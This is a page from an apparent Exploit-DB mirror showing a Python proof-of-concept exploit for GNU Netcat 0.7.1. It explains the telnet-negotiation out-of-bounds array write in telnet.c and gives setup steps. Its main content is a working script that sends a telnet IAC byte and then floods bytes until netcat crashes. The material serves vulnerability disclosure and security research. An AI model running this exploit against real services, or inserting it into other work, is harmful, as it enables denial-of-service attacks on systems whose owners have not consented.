bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/dos/40866.py
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

78 lines
No EOL
2.3 KiB
Python
Executable file
Raw Permalink Blame History

#/usr/bin/python
#-*- Coding: utf-8 -*-
### GNU Netcat 0.7.1 - Out of bounds array write (Access Violation) by n30m1nd ###
# Date: 2016-11-19
# Exploit Author: n30m1nd
# Vendor Homepage: http://netcat.sourceforge.net/
# Software Link: https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
# Version: 0.7.1
# Tested on: Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux
# Credits
# =======
# Props to Giovanni and Armando creators of this useful piece of software, thank you guys!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better. See you at AWE!
# How to
# ======
# * Get a distribution that ships with gnu netcat or Compile netcat from sources:
# * # Download
# * tar -xzf netcat-0.7.1.tar.gz
# * cd netcat-0.7.1/
# * ./configure
# * make
# * # Netcat will be deployed in src/netcat
#
# * Set netcat to listen like the following:
# * ./netcat -nlvp 12347 -T
# * Just run this script on a different terminal
#
# Why?
# ====
# When the Telnet Negotiation is activated (-T option), Netcat parses the incoming packets looking for Telnet Control Codes
# by running them through buggy switch/case code.
# Aforementioned code fails to safely check for array boundaries resulting in an array out of bounds write.
# Vulnerable code
# ===============
# telnet.c
# ...
# 76 static unsigned char getrq[4];
# 77 static int l = 0;
# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos;
# ...
# 88 /* loop all chars of the string */
# 89 for (i = 0; i < ref_size; i++) {
# 90 /* if we found IAC char OR we are fetching a IAC code string process it */
# 91 if ((buf[i] != TELNET_IAC) && (l == 0))
# ...
#100 getrq[l++] = buf[i]; // BANG!
# 99 /* copy the char in the IAC-code-building buffer */
# ...
# 76 static unsigned char getrq[4];
# 77 static int l = 0;
# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos;
# Exploit code
# ============
import socket
RHOST = "127.0.0.1"
RPORT = 12347
print("[+] Connecting to %s:%d") % (RHOST, RPORT)
s = socket.create_connection((RHOST, RPORT))
s.send("\xFF") # Telnet control character
print("[+] Telnet control character sent")
print("[i] Starting")
try:
i = 0
while True: # Loop until it crashes
i += 1
s.send("\x30")
except:
print("[+] GNU Netcat crashed on iteration: %d") % (i)
Reference in a new issue View git blame Copy permalink